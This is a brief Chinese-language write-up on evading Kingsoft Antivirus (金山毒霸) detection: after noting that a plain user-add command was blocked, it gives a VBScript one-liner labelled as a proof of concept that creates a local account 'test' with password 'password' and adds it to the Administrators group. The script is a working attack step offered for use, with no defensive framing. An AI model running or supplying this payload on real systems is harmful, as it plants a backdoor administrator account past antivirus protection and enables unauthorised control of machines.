目录
描述
通过安装金山毒霸软件去绕过它的检测机制;
安装
查看用户信息
添加用户被金山毒霸拦截
进行POC
set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user","test"):od.SetPassword "password":od.SetInfo:Set of=GetObject(os&"/test",user):oe.add os&"/test"